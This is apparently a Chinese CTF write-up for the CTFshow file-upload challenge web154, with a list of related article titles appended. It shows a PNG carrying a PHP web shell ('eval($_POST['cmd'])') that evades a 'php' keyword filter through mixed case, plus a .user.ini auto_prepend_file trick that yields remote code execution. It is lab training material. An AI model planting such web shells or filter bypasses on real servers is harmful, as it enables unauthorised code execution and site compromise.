目录

  • 思路
  • 总结

思路

上传一个包含shell的png文件,发现上传失败

清空文件内容,发现上传成功,可能过滤文件中的关键字,经过尝试,猜测文件对php进行过滤,可以用大小写来绕过


shell.png

<?phPecho 123;pHpinfo();eval($_POST['cmd']);
?>

发现其他和上题一样,直接上传.user.ini
.user.ini

auto_prepend_file=shell.png

然后访问/upload/index.php,直接RCE

总结

CTFshow 文件上传 web154相关推荐

  1. CTFshow 文件上传 web167

    目录 思路 总结 思路 根据提示上传了包含shell的jpg文件,上传成功,点击下载文件,发现没有存在文件包含点,访问upload检查是否有可执行文件,提示没有权限,但是发现中间件是apache 可以 ...

  2. CTFshow 文件上传 web153

    目录 思路 总结 思路 先上传带shell的png文件,上传成功 把文件后缀改成php,上传失败,改成xxxxx上传成功,得知是黑名单过滤, 上传phtml后缀,可以成功上传,但是无法解析,可以试试上 ...

  3. CTFSHOW文件上传篇

    151 绕过前端验证 方法1:直接关闭浏览器的js 方法2:上传.png(没错,只能是png,gif和jpg都不行)文件然后bp抓包后修改后缀,内容为一句话 直接访问upload/1.php然后 po ...

  4. ctfshow文件上传

    web151-前端绕过 提示前台校验不可靠,上传png图片,burp抓包修改为php 任意命令执行 这里关闭js的话点击上传图片就没有反应了. web152-后端绕过 一模一样的步骤,应该上一题前端判 ...

  5. CTFshow 文件上传 web166

    目录 思路 总结 思路 直接在bp发包一直失败,没什么思路,查看了一下网页源代码,提示上传zip 直接上传zip,显示下载文件,抓包发现url路径疑似文件包含点,返回的是一个html页面 在上传的zi ...

  6. CTFshow 文件上传 web162

    目录 思路 总结 思路 大致思路和上题类似,不过在上传.user.ini的时候发现.被过滤了,可以把包含的文件不带后缀来绕过 .user.ini GIF89aauto_prepend_file=png ...

  7. CTFshow 文件上传 web156

    目录 思路 总结 思路 这次发现把shell.php改成png上传的时候,提示文件类型不合规,可能对文件头进行检测,可以利用图片马来写入shell. https://github.com/hunter ...

  8. ctfshow 文件上传 web151~170

    目录 web151 web 152 web 153 web 154 web 155 web 156 web 157~159 web 160 web 161 web 162~163 web 164 we ...

  9. CTFshow 文件上传 web165

    目录 思路 总结 思路 上传jpg图片,返回包可以看出经过了二次渲染 试了很多次,群里的jpg哪来也没成功,放弃了 <?php$miniPayload = '<?php echo 123; ...

最新文章

  1. java fork join原理_细说Fork/Join框架
  2. 以太坊智能合约函数参数ABI编码,动态类型string编码,函数参数的ABI编码, 含c++代码
  3. javascript中变量
  4. Vue.js TypeScript 支持
  5. asp.net core MVC 过滤器之ExceptionFilter过滤器(一)
  6. 【整理】Nginx 战斗准备 —— 优化指南
  7. 关联挖掘算法Apriori和FP-Tree学习
  8. Android之Gradle Plugin Samples 之Gradle Library Projects
  9. xaml_XAML或JavaFx?
  10. c++ vector学习
  11. [JS][jQuery]清空元素html()、innerHTML= 与 empty()的区别 、remove()区别
  12. pandas—pandas.DataFrame.query与pandas.DataFrame.reset_index
  13. ROS 发布kitti数据集的gps信息
  14. 使用kettle进行数据清洗
  15. Blender建模基础(二):建模篇
  16. 华为计算机的隐藏应用程序,华为平板5怎么隐藏软件 荣耀5平板怎么隐藏应用程序?...
  17. exsi rh2288hv5 驱动_华为RH2288H服务器引导ServiceCD安装Windows Server操作系统
  18. html 多行注释的写法,web前端:JavaScript单行与多行注释书写格式
  19. 降噪耳机推荐,四款优秀的降噪耳机分享
  20. keilC51编译常见错误和警告说明

热门文章

  1. FT5X06 如何应用在10寸电容屏(linux-3.5电容屏驱动简析移植10寸电容屏驱动到Android4.2) (by liukun321咕唧咕唧)
  2. java开发数据库属于后端吗_JavaWeb后端开发,数据库知识需要掌握到何种程度?...
  3. Android配置build.gradle解锁更高逼格玩法(多版本共存、分服务器打包等)
  4. 使用Flutter之后,我们的CPU占用率降了50%
  5. SQL Server 数值四舍五入,小数点后保留2位
  6. 【搜遍互联网,集百家之长】环境配置从入门到放弃之Mac环境下,安装XAMPP,给phpstorm安装Xdebug调试工具...
  7. vCenter6.0配置二:配置HA群集
  8. Ubuntu 16.04 64位安装arm-linux-gcc交叉编译器以及samba服务器
  9. JQuery中对option的添加、删除、取值
  10. 在leangoo里怎么复制删除列表?